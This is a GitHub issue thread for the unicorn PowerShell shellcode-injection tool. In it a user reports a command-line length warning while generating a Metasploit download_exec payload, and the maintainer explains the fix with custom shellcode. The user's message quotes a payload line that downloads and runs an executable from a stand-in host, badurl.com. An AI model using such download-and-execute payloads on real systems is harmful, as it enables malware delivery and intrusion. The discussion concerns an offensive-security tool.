trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

Length of the payload is above command line limit length of 8191 #56

Closed praveenyadav1602 closed 6 years ago

praveenyadav1602 commented 6 years ago

Hello, I am getting a warning and my .exe is only 32 KB. I am using: windows/download_exec exe=test.exe url=http://badurl.com/payload.exe

[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off. Press {return} to continue.

What is the cause?

trustedsec commented 6 years ago

The primary issue here is that the payload for download_exec is much larger now for some reason, and when converting the binary to C in order to execute and run, it's larger than the length of 8191. It's not your binary, it's Metasploit's download_exec binary.

trustedsec commented 6 years ago

That was a fun one to write. I moved off of Metasploit due to it being way too large of a binary. I have a custom download/exec shellcode now written into unicorn that dynamically patches the code with your own URL, and it's super small. Shaved around 1000 bytes off of it doing it this way. It's now released in version 2.10 :)